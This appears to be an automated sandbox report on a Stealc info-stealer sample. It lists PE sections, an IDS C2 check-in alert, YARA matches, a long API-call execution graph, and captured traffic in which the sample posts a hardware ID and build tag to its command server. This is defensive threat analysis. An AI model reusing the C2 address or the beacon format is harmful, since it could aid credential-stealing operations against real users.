                           tlfgsqna | 0x675000 | 0x1000 | 0x400 | fda832d6f98ff4d34a74c5d5e44b9268 | False | 0.7490234375 | data | 5.85465547772816 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           .taggant | 0x676000 | 0x3000 | 0x2200 | 9a7c36eb3758f5464e9fb3ab0e1b670e | False | 0.06640625 | DOS executable (COM) | 0.8163163707597264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                           RT_MANIFEST | 0x673f50 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                           DLL | Import
                           kernel32.dll | lstrcpy
                           Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                           2024-11-20T17:41:19.739322+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49723 | 185.215.113.206 | 80 | TCP
                            • 185.215.113.206
                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                           0 | 192.168.2.6 | 49723 | 185.215.113.206 | 80 | 6620 | C:\Users\user\Desktop\file.exe
                           Timestamp | Bytes transferred | Direction | Data
                           Nov 20, 2024 17:41:17.842915058 CET | 90 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                           Nov 20, 2024 17:41:19.245033026 CET | 203 | IN | HTTP/1.1 200 OK
                            Date: Wed, 20 Nov 2024 16:41:19 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                           Nov 20, 2024 17:41:19.273442030 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----ECGDAAFIIJDAAAAKFHID
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                           Data Ascii:
                           ------ECGDAAFIIJDAAAAKFHID
                           Content-Disposition: form-data; name="hwid"

                           4498D60202C53528003197
                           ------ECGDAAFIIJDAAAAKFHID
                           Content-Disposition: form-data; name="build"

                           mars
                           ------ECGDAAFIIJDAAAAKFHID--
                           Nov 20, 2024 17:41:19.739178896 CET | 210 | IN | HTTP/1.1 200 OK
                            Date: Wed, 20 Nov 2024 16:41:19 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=
                            Target ID:1
                            Start time:11:41:14
                            Start date:20/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x390000
                            File size:1'753'088 bytes
                            MD5 hash:73DA003F0368F871F2BD1B9B2E0EC575
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.2192817969.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                              Execution Graph

                              Execution Coverage:5.3%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:16.5%
                              Total number of Nodes:1408
                              Total number of Limit Nodes:28
26324->26323 26326 3b1a3d 26325->26326 26327 3b1a4f lstrcpy lstrcat 26326->26327 26328 3b1a62 26326->26328 26327->26328 26329 3b1a91 26328->26329 26330 3b1a89 lstrcpy 26328->26330 26331 3b1a98 lstrlen 26329->26331 26330->26329 26332 3b1ab4 26331->26332 26333 3b1ac6 lstrcpy lstrcat 26332->26333 26334 3b1ad9 26332->26334 26333->26334 26335 3b1b08 26334->26335 26336 3b1b00 lstrcpy 26334->26336 26335->26088 26336->26335 26338 392a24 SystemTimeToFileTime SystemTimeToFileTime 26337->26338 26338->26091 26338->26092 26340 3b157f 26339->26340 26341 3b159f lstrcpy 26340->26341 26342 3b15a7 26340->26342 26341->26342 26343 3b15d7 lstrcpy 26342->26343 26344 3b15df 26342->26344 26343->26344 26345 3b160f lstrcpy 26344->26345 26346 3b1617 26344->26346 26345->26346 26347 3b0155 lstrlen 26346->26347 26348 3b1647 lstrcpy 26346->26348 26347->26109 26348->26347 26350 394a60 2 API calls 26349->26350 26351 392e82 26350->26351 26352 394a60 2 API calls 26351->26352 26353 392ea0 26352->26353 26354 394a60 2 API calls 26353->26354 26355 392eb6 26354->26355 26356 394a60 2 API calls 26355->26356 26357 392ecb 26356->26357 26358 394a60 2 API calls 26357->26358 26359 392eec 26358->26359 26360 394a60 2 API calls 26359->26360 26361 392f01 26360->26361 26362 394a60 2 API calls 26361->26362 26363 392f19 26362->26363 26364 394a60 2 API calls 26363->26364 26365 392f3a 26364->26365 26366 394a60 2 API calls 26365->26366 26367 392f4f 26366->26367 26368 394a60 2 API calls 26367->26368 26369 392f65 26368->26369 26370 394a60 2 API calls 26369->26370 26371 392f7b 26370->26371 26372 394a60 2 API calls 26371->26372 26373 392f91 26372->26373 26374 394a60 2 API calls 26373->26374 26375 392faa 26374->26375 26376 394a60 2 API calls 26375->26376 26377 392fc0 26376->26377 26378 394a60 2 API calls 26377->26378 26379 392fd6 26378->26379 26380 394a60 2 API calls 26379->26380 26381 392fec 26380->26381 26382 394a60 2 API calls 26381->26382 26383 393002 26382->26383 26384 394a60 2 API calls 26383->26384 26385 393018 
26384->26385 26386 394a60 2 API calls 26385->26386 26387 393031 26386->26387 26388 394a60 2 API calls 26387->26388 26389 393047 26388->26389 26390 394a60 2 API calls 26389->26390 26391 39305d 26390->26391 26392 394a60 2 API calls 26391->26392 26393 393073 26392->26393 26394 394a60 2 API calls 26393->26394 26395 393089 26394->26395 26396 394a60 2 API calls 26395->26396 26397 39309f 26396->26397 26398 394a60 2 API calls 26397->26398 26399 3930b8 26398->26399 26400 394a60 2 API calls 26399->26400 26401 3930ce 26400->26401 26402 394a60 2 API calls 26401->26402 26403 3930e4 26402->26403 26404 394a60 2 API calls 26403->26404 26405 3930fa 26404->26405 26406 394a60 2 API calls 26405->26406 26407 393110 26406->26407 26408 394a60 2 API calls 26407->26408 26409 393126 26408->26409 26410 394a60 2 API calls 26409->26410 26411 39313f 26410->26411 26412 394a60 2 API calls 26411->26412 26413 393155 26412->26413 26414 394a60 2 API calls 26413->26414 26415 39316b 26414->26415 26416 394a60 2 API calls 26415->26416 26417 393181 26416->26417 26418 394a60 2 API calls 26417->26418 26419 393197 26418->26419 26420 394a60 2 API calls 26419->26420 26421 3931ad 26420->26421 26422 394a60 2 API calls 26421->26422 26423 3931c6 26422->26423 26424 394a60 2 API calls 26423->26424 26425 3931dc 26424->26425 26426 394a60 2 API calls 26425->26426 26427 3931f2 26426->26427 26428 394a60 2 API calls 26427->26428 26429 393208 26428->26429 26430 394a60 2 API calls 26429->26430 26431 39321e 26430->26431 26432 394a60 2 API calls 26431->26432 26433 393234 26432->26433 26434 394a60 2 API calls 26433->26434 26435 39324d 26434->26435 26436 394a60 2 API calls 26435->26436 26437 393263 26436->26437 26438 394a60 2 API calls 26437->26438 26439 393279 26438->26439 26440 394a60 2 API calls 26439->26440 26441 39328f 26440->26441 26442 394a60 2 API calls 26441->26442 26443 3932a5 26442->26443 26444 394a60 2 API calls 26443->26444 26445 3932bb 26444->26445 26446 394a60 2 API calls 26445->26446 26447 3932d4 26446->26447 
26448 394a60 2 API calls 26447->26448 26449 3932ea 26448->26449 26450 394a60 2 API calls 26449->26450 26451 393300 26450->26451 26452 394a60 2 API calls 26451->26452 26453 393316 26452->26453 26454 394a60 2 API calls 26453->26454 26455 39332c 26454->26455 26456 394a60 2 API calls 26455->26456 26457 393342 26456->26457 26458 394a60 2 API calls 26457->26458 26459 39335b 26458->26459 26460 394a60 2 API calls 26459->26460 26461 393371 26460->26461 26462 394a60 2 API calls 26461->26462 26463 393387 26462->26463 26464 394a60 2 API calls 26463->26464 26465 39339d 26464->26465 26466 394a60 2 API calls 26465->26466 26467 3933b3 26466->26467 26468 394a60 2 API calls 26467->26468 26469 3933c9 26468->26469 26470 394a60 2 API calls 26469->26470 26471 3933e2 26470->26471 26472 394a60 2 API calls 26471->26472 26473 3933f8 26472->26473 26474 394a60 2 API calls 26473->26474 26475 39340e 26474->26475 26476 394a60 2 API calls 26475->26476 26477 393424 26476->26477 26478 394a60 2 API calls 26477->26478 26479 39343a 26478->26479 26480 394a60 2 API calls 26479->26480 26481 393450 26480->26481 26482 394a60 2 API calls 26481->26482 26483 393469 26482->26483 26484 394a60 2 API calls 26483->26484 26485 39347f 26484->26485 26486 394a60 2 API calls 26485->26486 26487 393495 26486->26487 26488 394a60 2 API calls 26487->26488 26489 3934ab 26488->26489 26490 394a60 2 API calls 26489->26490 26491 3934c1 26490->26491 26492 394a60 2 API calls 26491->26492 26493 3934d7 26492->26493 26494 394a60 2 API calls 26493->26494 26495 3934f0 26494->26495 26496 394a60 2 API calls 26495->26496 26497 393506 26496->26497 26498 394a60 2 API calls 26497->26498 26499 39351c 26498->26499 26500 394a60 2 API calls 26499->26500 26501 393532 26500->26501 26502 394a60 2 API calls 26501->26502 26503 393548 26502->26503 26504 394a60 2 API calls 26503->26504 26505 39355e 26504->26505 26506 394a60 2 API calls 26505->26506 26507 393577 26506->26507 26508 394a60 2 API calls 26507->26508 26509 39358d 26508->26509 26510 394a60 2 
API calls 26509->26510 26511 3935a3 26510->26511 26512 394a60 2 API calls 26511->26512 26513 3935b9 26512->26513 26514 394a60 2 API calls 26513->26514 26515 3935cf 26514->26515 26516 394a60 2 API calls 26515->26516 26517 3935e5 26516->26517 26518 394a60 2 API calls 26517->26518 26519 3935fe 26518->26519 26520 394a60 2 API calls 26519->26520 26521 393614 26520->26521 26522 394a60 2 API calls 26521->26522 26523 39362a 26522->26523 26524 394a60 2 API calls 26523->26524 26525 393640 26524->26525 26526 394a60 2 API calls 26525->26526 26527 393656 26526->26527 26528 394a60 2 API calls 26527->26528 26529 39366c 26528->26529 26530 394a60 2 API calls 26529->26530 26531 393685 26530->26531 26532 394a60 2 API calls 26531->26532 26533 39369b 26532->26533 26534 394a60 2 API calls 26533->26534 26535 3936b1 26534->26535 26536 394a60 2 API calls 26535->26536 26537 3936c7 26536->26537 26538 394a60 2 API calls 26537->26538 26539 3936dd 26538->26539 26540 394a60 2 API calls 26539->26540 26541 3936f3 26540->26541 26542 394a60 2 API calls 26541->26542 26543 39370c 26542->26543 26544 394a60 2 API calls 26543->26544 26545 393722 26544->26545 26546 394a60 2 API calls 26545->26546 26547 393738 26546->26547 26548 394a60 2 API calls 26547->26548 26549 39374e 26548->26549 26550 394a60 2 API calls 26549->26550 26551 393764 26550->26551 26552 394a60 2 API calls 26551->26552 26553 39377a 26552->26553 26554 394a60 2 API calls 26553->26554 26555 393793 26554->26555 26556 394a60 2 API calls 26555->26556 26557 3937a9 26556->26557 26558 394a60 2 API calls 26557->26558 26559 3937bf 26558->26559 26560 394a60 2 API calls 26559->26560 26561 3937d5 26560->26561 26562 394a60 2 API calls 26561->26562 26563 3937eb 26562->26563 26564 394a60 2 API calls 26563->26564 26565 393801 26564->26565 26566 394a60 2 API calls 26565->26566 26567 39381a 26566->26567 26568 394a60 2 API calls 26567->26568 26569 393830 26568->26569 26570 394a60 2 API calls 26569->26570 26571 393846 26570->26571 26572 394a60 2 API calls 
26571->26572 26573 39385c 26572->26573 26574 394a60 2 API calls 26573->26574 26575 393872 26574->26575 26576 394a60 2 API calls 26575->26576 26577 393888 26576->26577 26578 394a60 2 API calls 26577->26578 26579 3938a1 26578->26579 26580 394a60 2 API calls 26579->26580 26581 3938b7 26580->26581 26582 394a60 2 API calls 26581->26582 26583 3938cd 26582->26583 26584 394a60 2 API calls 26583->26584 26585 3938e3 26584->26585 26586 394a60 2 API calls 26585->26586 26587 3938f9 26586->26587 26588 394a60 2 API calls 26587->26588 26589 39390f 26588->26589 26590 394a60 2 API calls 26589->26590 26591 393928 26590->26591 26592 394a60 2 API calls 26591->26592 26593 39393e 26592->26593 26594 394a60 2 API calls 26593->26594 26595 393954 26594->26595 26596 394a60 2 API calls 26595->26596 26597 39396a 26596->26597 26598 394a60 2 API calls 26597->26598 26599 393980 26598->26599 26600 394a60 2 API calls 26599->26600 26601 393996 26600->26601 26602 394a60 2 API calls 26601->26602 26603 3939af 26602->26603 26604 394a60 2 API calls 26603->26604 26605 3939c5 26604->26605 26606 394a60 2 API calls 26605->26606 26607 3939db 26606->26607 26608 394a60 2 API calls 26607->26608 26609 3939f1 26608->26609 26610 394a60 2 API calls 26609->26610 26611 393a07 26610->26611 26612 394a60 2 API calls 26611->26612 26613 393a1d 26612->26613 26614 394a60 2 API calls 26613->26614 26615 393a36 26614->26615 26616 394a60 2 API calls 26615->26616 26617 393a4c 26616->26617 26618 394a60 2 API calls 26617->26618 26619 393a62 26618->26619 26620 394a60 2 API calls 26619->26620 26621 393a78 26620->26621 26622 394a60 2 API calls 26621->26622 26623 393a8e 26622->26623 26624 394a60 2 API calls 26623->26624 26625 393aa4 26624->26625 26626 394a60 2 API calls 26625->26626 26627 393abd 26626->26627 26628 394a60 2 API calls 26627->26628 26629 393ad3 26628->26629 26630 394a60 2 API calls 26629->26630 26631 393ae9 26630->26631 26632 394a60 2 API calls 26631->26632 26633 393aff 26632->26633 26634 394a60 2 API calls 26633->26634 
26635 393b15 26634->26635 26636 394a60 2 API calls 26635->26636 26637 393b2b 26636->26637 26638 394a60 2 API calls 26637->26638 26639 393b44 26638->26639 26640 394a60 2 API calls 26639->26640 26641 393b5a 26640->26641 26642 394a60 2 API calls 26641->26642 26643 393b70 26642->26643 26644 394a60 2 API calls 26643->26644 26645 393b86 26644->26645 26646 394a60 2 API calls 26645->26646 26647 393b9c 26646->26647 26648 394a60 2 API calls 26647->26648 26649 393bb2 26648->26649 26650 394a60 2 API calls 26649->26650 26651 393bcb 26650->26651 26652 394a60 2 API calls 26651->26652 26653 393be1 26652->26653 26654 394a60 2 API calls 26653->26654 26655 393bf7 26654->26655 26656 394a60 2 API calls 26655->26656 26657 393c0d 26656->26657 26658 394a60 2 API calls 26657->26658 26659 393c23 26658->26659 26660 394a60 2 API calls 26659->26660 26661 393c39 26660->26661 26662 394a60 2 API calls 26661->26662 26663 393c52 26662->26663 26664 394a60 2 API calls 26663->26664 26665 393c68 26664->26665 26666 394a60 2 API calls 26665->26666 26667 393c7e 26666->26667 26668 394a60 2 API calls 26667->26668 26669 393c94 26668->26669 26670 394a60 2 API calls 26669->26670 26671 393caa 26670->26671 26672 394a60 2 API calls 26671->26672 26673 393cc0 26672->26673 26674 394a60 2 API calls 26673->26674 26675 393cd9 26674->26675 26676 394a60 2 API calls 26675->26676 26677 393cef 26676->26677 26678 394a60 2 API calls 26677->26678 26679 393d05 26678->26679 26680 394a60 2 API calls 26679->26680 26681 393d1b 26680->26681 26682 394a60 2 API calls 26681->26682 26683 393d31 26682->26683 26684 394a60 2 API calls 26683->26684 26685 393d47 26684->26685 26686 394a60 2 API calls 26685->26686 26687 393d60 26686->26687 26688 394a60 2 API calls 26687->26688 26689 393d76 26688->26689 26690 394a60 2 API calls 26689->26690 26691 393d8c 26690->26691 26692 394a60 2 API calls 26691->26692 26693 393da2 26692->26693 26694 394a60 2 API calls 26693->26694 26695 393db8 26694->26695 26696 394a60 2 API calls 26695->26696 26697 393dce 
26696->26697 26698 394a60 2 API calls 26697->26698 26699 393de7 26698->26699 26700 394a60 2 API calls 26699->26700 26701 393dfd 26700->26701 26702 394a60 2 API calls 26701->26702 26703 393e13 26702->26703 26704 394a60 2 API calls 26703->26704 26705 393e29 26704->26705 26706 394a60 2 API calls 26705->26706 26707 393e3f 26706->26707 26708 394a60 2 API calls 26707->26708 26709 393e55 26708->26709 26710 394a60 2 API calls 26709->26710 26711 393e6e 26710->26711 26712 394a60 2 API calls 26711->26712 26713 393e84 26712->26713 26714 394a60 2 API calls 26713->26714 26715 393e9a 26714->26715 26716 394a60 2 API calls 26715->26716 26717 393eb0 26716->26717 26718 394a60 2 API calls 26717->26718 26719 393ec6 26718->26719 26720 394a60 2 API calls 26719->26720 26721 393edc 26720->26721 26722 394a60 2 API calls 26721->26722 26723 393ef5 26722->26723 26724 394a60 2 API calls 26723->26724 26725 393f0b 26724->26725 26726 394a60 2 API calls 26725->26726 26727 393f21 26726->26727 26728 394a60 2 API calls 26727->26728 26729 393f37 26728->26729 26730 394a60 2 API calls 26729->26730 26731 393f4d 26730->26731 26732 394a60 2 API calls 26731->26732 26733 393f63 26732->26733 26734 394a60 2 API calls 26733->26734 26735 393f7c 26734->26735 26736 394a60 2 API calls 26735->26736 26737 393f92 26736->26737 26738 394a60 2 API calls 26737->26738 26739 393fa8 26738->26739 26740 394a60 2 API calls 26739->26740 26741 393fbe 26740->26741 26742 394a60 2 API calls 26741->26742 26743 393fd4 26742->26743 26744 394a60 2 API calls 26743->26744 26745 393fea 26744->26745 26746 394a60 2 API calls 26745->26746 26747 394003 26746->26747 26748 394a60 2 API calls 26747->26748 26749 394019 26748->26749 26750 394a60 2 API calls 26749->26750 26751 39402f 26750->26751 26752 394a60 2 API calls 26751->26752 26753 394045 26752->26753 26754 394a60 2 API calls 26753->26754 26755 39405b 26754->26755 26756 394a60 2 API calls 26755->26756 26757 394071 26756->26757 26758 394a60 2 API calls 26757->26758 26759 39408a 26758->26759 
26760 394a60 2 API calls 26759->26760 26761 3940a0 26760->26761 26762 394a60 2 API calls 26761->26762 26763 3940b6 26762->26763 26764 394a60 2 API calls 26763->26764 26765 3940cc 26764->26765 26766 394a60 2 API calls 26765->26766 26767 3940e2 26766->26767 26768 394a60 2 API calls 26767->26768 26769 3940f8 26768->26769 26770 394a60 2 API calls 26769->26770 26771 394111 26770->26771 26772 394a60 2 API calls 26771->26772 26773 394127 26772->26773 26774 394a60 2 API calls 26773->26774 26775 39413d 26774->26775 26776 394a60 2 API calls 26775->26776 26777 394153 26776->26777 26778 394a60 2 API calls 26777->26778 26779 394169 26778->26779 26780 394a60 2 API calls 26779->26780 26781 39417f 26780->26781 26782 394a60 2 API calls 26781->26782 26783 394198 26782->26783 26784 394a60 2 API calls 26783->26784 26785 3941ae 26784->26785 26786 394a60 2 API calls 26785->26786 26787 3941c4 26786->26787 26788 394a60 2 API calls 26787->26788 26789 3941da 26788->26789 26790 394a60 2 API calls 26789->26790 26791 3941f0 26790->26791 26792 394a60 2 API calls 26791->26792 26793 394206 26792->26793 26794 394a60 2 API calls 26793->26794 26795 39421f 26794->26795 26796 394a60 2 API calls 26795->26796 26797 394235 26796->26797 26798 394a60 2 API calls 26797->26798 26799 39424b 26798->26799 26800 394a60 2 API calls 26799->26800 26801 394261 26800->26801 26802 394a60 2 API calls 26801->26802 26803 394277 26802->26803 26804 394a60 2 API calls 26803->26804 26805 39428d 26804->26805 26806 394a60 2 API calls 26805->26806 26807 3942a6 26806->26807 26808 394a60 2 API calls 26807->26808 26809 3942bc 26808->26809 26810 394a60 2 API calls 26809->26810 26811 3942d2 26810->26811 26812 394a60 2 API calls 26811->26812 26813 3942e8 26812->26813 26814 394a60 2 API calls 26813->26814 26815 3942fe 26814->26815 26816 394a60 2 API calls 26815->26816 26817 394314 26816->26817 26818 394a60 2 API calls 26817->26818 26819 39432d 26818->26819 26820 394a60 2 API calls 26819->26820 26821 394343 26820->26821 26822 394a60 2 
API calls 26821->26822 26823 394359 26822->26823 26824 394a60 2 API calls 26823->26824 26825 39436f 26824->26825 26826 394a60 2 API calls 26825->26826 26827 394385 26826->26827 26828 394a60 2 API calls 26827->26828 26829 39439b 26828->26829 26830 394a60 2 API calls 26829->26830 26831 3943b4 26830->26831 26832 394a60 2 API calls 26831->26832 26833 3943ca 26832->26833 26834 394a60 2 API calls 26833->26834 26835 3943e0 26834->26835 26836 394a60 2 API calls 26835->26836 26837 3943f6 26836->26837 26838 394a60 2 API calls 26837->26838 26839 39440c 26838->26839 26840 394a60 2 API calls 26839->26840 26841 394422 26840->26841 26842 394a60 2 API calls 26841->26842 26843 39443b 26842->26843 26844 394a60 2 API calls 26843->26844 26845 394451 26844->26845 26846 394a60 2 API calls 26845->26846 26847 394467 26846->26847 26848 394a60 2 API calls 26847->26848 26849 39447d 26848->26849 26850 394a60 2 API calls 26849->26850 26851 394493 26850->26851 26852 394a60 2 API calls 26851->26852 26853 3944a9 26852->26853 26854 394a60 2 API calls 26853->26854 26855 3944c2 26854->26855 26856 394a60 2 API calls 26855->26856 26857 3944d8 26856->26857 26858 394a60 2 API calls 26857->26858 26859 3944ee 26858->26859 26860 394a60 2 API calls 26859->26860 26861 394504 26860->26861 26862 394a60 2 API calls 26861->26862 26863 39451a 26862->26863 26864 394a60 2 API calls 26863->26864 26865 394530 26864->26865 26866 394a60 2 API calls 26865->26866 26867 394549 26866->26867 26868 394a60 2 API calls 26867->26868 26869 39455f 26868->26869 26870 394a60 2 API calls 26869->26870 26871 394575 26870->26871 26872 394a60 2 API calls 26871->26872 26873 39458b 26872->26873 26874 394a60 2 API calls 26873->26874 26875 3945a1 26874->26875 26876 394a60 2 API calls 26875->26876 26877 3945b7 26876->26877 26878 394a60 2 API calls 26877->26878 26879 3945d0 26878->26879 26880 394a60 2 API calls 26879->26880 26881 3945e6 26880->26881 26882 394a60 2 API calls 26881->26882 26883 3945fc 26882->26883 26884 394a60 2 API calls 
26883->26884 26885 394612 26884->26885 26886 394a60 2 API calls 26885->26886 26887 394628 26886->26887 26888 394a60 2 API calls 26887->26888 26889 39463e 26888->26889 26890 394a60 2 API calls 26889->26890 26891 394657 26890->26891 26892 394a60 2 API calls 26891->26892 26893 39466d 26892->26893 26894 394a60 2 API calls 26893->26894 26895 394683 26894->26895 26896 394a60 2 API calls 26895->26896 26897 394699 26896->26897 26898 394a60 2 API calls 26897->26898 26899 3946af 26898->26899 26900 394a60 2 API calls 26899->26900 26901 3946c5 26900->26901 26902 394a60 2 API calls 26901->26902 26903 3946de 26902->26903 26904 394a60 2 API calls 26903->26904 26905 3946f4 26904->26905 26906 394a60 2 API calls 26905->26906 26907 39470a 26906->26907 26908 394a60 2 API calls 26907->26908 26909 394720 26908->26909 26910 394a60 2 API calls 26909->26910 26911 394736 26910->26911 26912 394a60 2 API calls 26911->26912 26913 39474c 26912->26913 26914 394a60 2 API calls 26913->26914 26915 394765 26914->26915 26916 394a60 2 API calls 26915->26916 26917 39477b 26916->26917 26918 394a60 2 API calls 26917->26918 26919 394791 26918->26919 26920 394a60 2 API calls 26919->26920 26921 3947a7 26920->26921 26922 394a60 2 API calls 26921->26922 26923 3947bd 26922->26923 26924 394a60 2 API calls 26923->26924 26925 3947d3 26924->26925 26926 394a60 2 API calls 26925->26926 26927 3947ec 26926->26927 26928 394a60 2 API calls 26927->26928 26929 394802 26928->26929 26930 394a60 2 API calls 26929->26930 26931 394818 26930->26931 26932 394a60 2 API calls 26931->26932 26933 39482e 26932->26933 26934 394a60 2 API calls 26933->26934 26935 394844 26934->26935 26936 394a60 2 API calls 26935->26936 26937 39485a 26936->26937 26938 394a60 2 API calls 26937->26938 26939 394873 26938->26939 26940 394a60 2 API calls 26939->26940 26941 394889 26940->26941 26942 394a60 2 API calls 26941->26942 26943 39489f 26942->26943 26944 394a60 2 API calls 26943->26944 26945 3948b5 26944->26945 26946 394a60 2 API calls 26945->26946 
26947 3948cb 26946->26947 26948 394a60 2 API calls 26947->26948 26949 3948e1 26948->26949 26950 394a60 2 API calls 26949->26950 26951 3948fa 26950->26951 26952 394a60 2 API calls 26951->26952 26953 394910 26952->26953 26954 394a60 2 API calls 26953->26954 26955 394926 26954->26955 26956 394a60 2 API calls 26955->26956 26957 39493c 26956->26957 26958 394a60 2 API calls 26957->26958 26959 394952 26958->26959 26960 394a60 2 API calls 26959->26960 26961 394968 26960->26961 26962 394a60 2 API calls 26961->26962 26963 394981 26962->26963 26964 394a60 2 API calls 26963->26964 26965 394997 26964->26965 26966 394a60 2 API calls 26965->26966 26967 3949ad 26966->26967 26968 394a60 2 API calls 26967->26968 26969 3949c3 26968->26969 26970 394a60 2 API calls 26969->26970 26971 3949d9 26970->26971 26972 394a60 2 API calls 26971->26972 26973 3949ef 26972->26973 26974 394a60 2 API calls 26973->26974 26975 394a08 26974->26975 26976 394a60 2 API calls 26975->26976 26977 394a1e 26976->26977 26978 394a60 2 API calls 26977->26978 26979 394a34 26978->26979 26980 394a60 2 API calls 26979->26980 26981 394a4a 26980->26981 26982 3b66e0 26981->26982 26983 3b6afe 8 API calls 26982->26983 26984 3b66ed 43 API calls 26982->26984 26985 3b6c08 26983->26985 26986 3b6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26983->26986 26984->26983 26987 3b6cd2 26985->26987 26988 3b6c15 8 API calls 26985->26988 26986->26985 26989 3b6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26987->26989 26990 3b6d4f 26987->26990 26988->26987 26989->26990 26991 3b6de9 26990->26991 26992 3b6d5c 6 API calls 26990->26992 26993 3b6f10 26991->26993 26994 3b6df6 12 API calls 26991->26994 26992->26991 26995 3b6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26993->26995 26996 3b6f8d 26993->26996 26994->26993 26995->26996 26997 3b6fc1 26996->26997 26998 3b6f96 GetProcAddress GetProcAddress 26996->26998 26999 3b6fca GetProcAddress 
GetProcAddress 26997->26999 27000 3b6ff5 26997->27000 26998->26997 26999->27000 27001 3b70ed 27000->27001 27002 3b7002 10 API calls 27000->27002 27003 3b7152 27001->27003 27004 3b70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27001->27004 27002->27001 27005 3b715b GetProcAddress 27003->27005 27006 3b716e 27003->27006 27004->27003 27005->27006 27007 3b051f 27006->27007 27008 3b7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27006->27008 27009 391530 27007->27009 27008->27007 27318 391610 27009->27318 27011 39153b 27012 391555 lstrcpy 27011->27012 27013 39155d 27011->27013 27012->27013 27014 391577 lstrcpy 27013->27014 27015 39157f 27013->27015 27014->27015 27016 391599 lstrcpy 27015->27016 27018 3915a1 27015->27018 27016->27018 27017 391605 27020 3af1b0 lstrlen 27017->27020 27018->27017 27019 3915fd lstrcpy 27018->27019 27019->27017 27021 3af1e4 27020->27021 27022 3af1eb lstrcpy 27021->27022 27023 3af1f7 lstrlen 27021->27023 27022->27023 27024 3af208 27023->27024 27025 3af21b lstrlen 27024->27025 27026 3af20f lstrcpy 27024->27026 27027 3af22c 27025->27027 27026->27025 27028 3af233 lstrcpy 27027->27028 27029 3af23f 27027->27029 27028->27029 27030 3af258 lstrcpy 27029->27030 27031 3af264 27029->27031 27030->27031 27032 3af286 lstrcpy 27031->27032 27033 3af292 27031->27033 27032->27033 27034 3af2ba lstrcpy 27033->27034 27035 3af2c6 27033->27035 27034->27035 27036 3af2ea lstrcpy 27035->27036 27097 3af300 27035->27097 27036->27097 27037 3af30c lstrlen 27037->27097 27038 3af4b9 lstrcpy 27038->27097 27039 3af3a1 lstrcpy 27039->27097 27040 3af3c5 lstrcpy 27040->27097 27041 3af4e8 lstrcpy 27102 3af4f0 27041->27102 27042 3aefb0 35 API calls 27042->27102 27043 3af479 lstrcpy 27043->27097 27044 3af59c lstrcpy 27044->27102 27045 3af616 StrCmpCA 27046 3af70f StrCmpCA 27045->27046 27045->27102 27050 3afe8e 27046->27050 27046->27097 27047 3afa29 StrCmpCA 27058 3afe2b 27047->27058 27047->27097 27048 3af73e lstrlen 27048->27097 27049 3afead lstrlen 
27064 3afec7 27049->27064 27050->27049 27056 3afea5 lstrcpy 27050->27056 27051 3afd4d StrCmpCA 27054 3afd60 Sleep 27051->27054 27061 3afd75 27051->27061 27052 3af64a lstrcpy 27052->27102 27053 3afa58 lstrlen 27053->27097 27054->27097 27055 391530 8 API calls 27055->27102 27056->27049 27057 3afe4a lstrlen 27071 3afe64 27057->27071 27058->27057 27059 3afe42 lstrcpy 27058->27059 27059->27057 27060 3af89e lstrcpy 27060->27097 27062 3afd94 lstrlen 27061->27062 27066 3afd8c lstrcpy 27061->27066 27073 3afdae 27062->27073 27063 3af76f lstrcpy 27063->27097 27065 3afee7 lstrlen 27064->27065 27068 3afedf lstrcpy 27064->27068 27069 3aff01 27065->27069 27066->27062 27067 3afbb8 lstrcpy 27067->27097 27068->27065 27079 3aff21 27069->27079 27080 3aff19 lstrcpy 27069->27080 27070 3afa89 lstrcpy 27070->27097 27072 3afdce lstrlen 27071->27072 27074 3afe7c lstrcpy 27071->27074 27086 3afde8 27072->27086 27073->27072 27084 3afdc6 lstrcpy 27073->27084 27074->27072 27075 3af791 lstrcpy 27075->27097 27077 391530 8 API calls 27077->27097 27078 3af8cd lstrcpy 27078->27102 27081 391610 4 API calls 27079->27081 27080->27079 27104 3afe13 27081->27104 27082 3afaab lstrcpy 27082->27097 27083 3af698 lstrcpy 27083->27102 27084->27072 27085 3afbe7 lstrcpy 27085->27102 27088 3afe08 27086->27088 27089 3afe00 